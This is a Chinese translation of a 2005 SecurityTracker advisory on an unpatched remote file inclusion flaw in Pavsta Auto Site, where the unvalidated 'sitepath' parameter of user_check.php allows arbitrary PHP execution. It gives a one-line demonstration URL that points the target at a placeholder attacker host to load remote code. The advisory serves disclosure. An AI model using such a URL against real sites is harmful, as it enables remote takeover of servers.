[翻译]Pavsta Auto Site包含的user_check.php文件存在漏洞允许用户运行任意指令

资料翻译： fpx[BCT]
翻译网站:  Bug.Center.Team http://www.cnbct.org


SecurityTracker ID:  1014321
SecurityTracker URL:  http:// securitytracker.com/id?1014321
CVE 叁考:  GENERIC-MAP-NOMATCH  
日期:    2005 年6月 29 日
影响:    用户经由网络可以运行任意代码
影响版本:  2004 年9月22 日

描述:  来自[A]nomaly [1]n [T]he [S]ystem CreW的V4mu发现Pavsta Auto Site存在漏洞，
远程用户可以在目标主机上运行任意代码。 'user_check.php' 脚本包含的‘functions.php’
的‘sitepath’参数没有进行适当的检验。远程用户可以提供特殊构造的URL在目标系统是
执行任意的PHP代码，包括系统指令，得到系统权限。

漏洞示范：
http://[target]/user_check.php?sitepath=http://[attacker]

解决:    厂商尚未解决。
厂商网址:  www.pavsta.com/freescripts.php?action=pavstaautosite